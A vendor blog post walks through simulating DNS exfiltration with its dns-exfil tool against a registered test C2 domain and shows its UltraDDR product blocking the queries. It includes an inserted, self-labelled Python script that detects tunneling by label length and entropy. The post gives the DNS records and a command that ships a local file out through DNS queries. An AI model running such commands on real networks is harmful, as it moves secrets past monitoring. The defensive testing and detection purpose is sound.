
Blocking DNS Exfiltration with UltraDDR 


In the first post of this series, An Introduction to Data Exfiltration and Tunneling via DNS, we introduced DNS exfiltration and tunneling and explained the process of building queries and how these techniques were being used today by malware and attackers. In the second post, Detecting DNS Exfiltration and Tunneling with UltraDDR, we gave an example of how DNS exfiltration works using sample data and then discussed how UltraDDR detects and blocks this activity.  

In this post, we’ll pull it all together by demonstrating the process using a tool we’ve designed, giving you a firsthand look at these attacks. But that’s not all! We’ll also cover countermeasures, showing how UltraDDR, a cutting-edge cybersecurity solution, effectively blocks this tool. Lastly, we’ll analyze the logs, highlighting successfully obstructed queries.  

To see the video showcasing the entire process, click here.

Setting up a simulated C2 domain. 

To prepare for the demo, we registered the domain setandforget.xyz and created two wildcard resource records to simulate our authoritative DNS tunneling endpoint: 

*.setandforget.xyz. 1799 IN A 35.153.230.115 

*.setandforget.xyz. 1799 IN TXT "OK" 

Register endpoint with UltraDDR. 

To ensure UltraDDR can identify you, apply a specific policy, and associate your logs with a customer account, simply input your public IP address in the source networks configuration screen. 

Using DNS-Exfil. 

To explore how UltraDDR detects and blocks DNS exfiltration and tunneling, we need a tool to simulate this behavior. We wrote dns-exfil, which is well suited to the job: it generates all of the outbound DNS queries without needing a custom authoritative server that understands how to receive the data. 

To use dns-exfil, clone it with git from our repository at https://github.com/rybolov/dns-exfil and set up a Python virtual environment with the required libraries. Once the configuration is complete, you can launch dns-exfil and start sending data with the following command: 

$ python3 ./main.py -t A -n 204.74.122.5 -d setandforget.xyz -f ./pirate.secrets.txt 

Checking the UltraDDR logs. 

Within the UltraDDR web portal, navigate to the logs section. Apply a search filter for the specific domain to view the logs generated by dns-exfil. 

You will observe that setandforget.xyz was blocked due to the domain and TLD being untrusted. 
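As an added example (not part of the original post and not code from the dns-exfil project), the script below runs the kind of per-domain query-pattern check this series describes over a handful of constructed log lines, complementing the reputation-based block shown above. The log layout ("timestamp client qname qtype"), the thresholds and the sample values are assumptions for the example; the long hex labels under setandforget.xyz imitate what a chunked-upload tool such as dns-exfil produces.

```python
import math
from collections import Counter, defaultdict

# Constructed sample log lines (assumed "timestamp client qname qtype" layout;
# this is NOT UltraDDR's log schema). The 32-character hex labels under
# setandforget.xyz mimic data chunks carried in the leftmost label.
SAMPLE_LOG = """\
2024-03-14T10:00:01Z 10.0.0.5 www.example.com A
2024-03-14T10:00:02Z 10.0.0.5 mail.example.com A
2024-03-14T10:00:02Z 10.0.0.5 static.cdn-provider.net A
2024-03-14T10:00:03Z 10.0.0.5 7e2a9c4f1b8d3056c3f81e6b0a5d9247.setandforget.xyz A
2024-03-14T10:00:03Z 10.0.0.5 4b09e7d2a6c1f835d5a3c8e1f0b69427.setandforget.xyz A
2024-03-14T10:00:03Z 10.0.0.5 9f3c0b7a2e5d81641a6e4d0f9b2c8573.setandforget.xyz A
2024-03-14T10:00:04Z 10.0.0.5 e8d4b1f7a3c6925062f0c9a3e1b5d847.setandforget.xyz A
2024-03-14T10:00:04Z 10.0.0.5 05a9e2c7f4b1d836b7d1f4a0e8c35926.setandforget.xyz A
2024-03-14T10:00:04Z 10.0.0.5 3c1d9f6a0e2b7548a0e6b3c8d1f27594.setandforget.xyz A
2024-03-14T10:00:05Z 10.0.0.5 api.example.com A
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded data scores far higher than words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def split_name(qname: str):
    """Return (leftmost_label, base_domain).

    Base domain is approximated as the last two labels; a production check
    should use the Public Suffix List instead of this shortcut (assumption)."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return labels[0], ".".join(labels[-2:])


def analyze(log_text: str) -> dict:
    """Aggregate query-pattern statistics per base domain from raw log lines."""
    acc = defaultdict(lambda: {"queries": 0, "names": set(), "label_len": 0, "entropy": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        qname = parts[2]
        label, base = split_name(qname)
        st = acc[base]
        st["queries"] += 1
        st["names"].add(qname)
        st["label_len"] += len(label)
        st["entropy"] += shannon_entropy(label)
    stats = {}
    for base, st in acc.items():
        q = st["queries"]
        stats[base] = {
            "queries": q,
            "unique_subdomains": len(st["names"]),
            "avg_label_len": st["label_len"] / q,
            "avg_entropy": st["entropy"] / q,
        }
    return stats


def flag_exfil(stats: dict, min_unique=5, min_label_len=20, min_entropy=3.0) -> list:
    """Base domains whose pattern looks like chunked data in the leftmost label:
    many distinct names, long labels, and high per-label entropy (thresholds are
    illustrative assumptions and need tuning per environment)."""
    return sorted(
        base for base, st in stats.items()
        if st["unique_subdomains"] >= min_unique
        and st["avg_label_len"] >= min_label_len
        and st["avg_entropy"] >= min_entropy
    )


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for base, st in sorted(results.items()):
        print(f"{base:25} queries={st['queries']:3} unique={st['unique_subdomains']:3} "
              f"avg_len={st['avg_label_len']:5.1f} avg_entropy={st['avg_entropy']:4.2f}")
    print("flagged:", flag_exfil(results))
```

Run it with `python3` to print a per-domain summary; only setandforget.xyz trips all three thresholds, while example.com and cdn-provider.net stay below them. A pattern check like this is useful alongside a Protective DNS block because it can surface a tunneling domain that has not yet earned an untrusted reputation.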

Series summary. 

This series of posts has guided readers through the intricacies of DNS exfiltration and tunneling, the setup of a simulated authoritative DNS tunneling endpoint, and the use of UltraDDR to monitor and block these potential security threats.  

In the first post, we explored the concept of DNS exfiltration and tunneling, highlighting their potential risks and a corresponding increase in auditor, red-team, and purple-team testing using these techniques. The second post delved into the query patterns of these activities and how UltraDDR detects and blocks them. 

The third installment tied all these concepts together into a demo video and an explanation of the steps that you can take inside your environment to prepare for a simulated DNS exfiltration, use dns-exfil to perform a simulation test, and inspect the UltraDDR logs for evidence that the exfiltration queries were detected and blocked.  

This series serves as a comprehensive guide to understanding and combating DNS exfiltration and tunneling threats, demonstrating real-world applications and solutions using our Protective DNS solution, UltraDDR. 

To discover how UltraDDR can help protect your business, visit our product page.

Last Updated: March 14, 2024
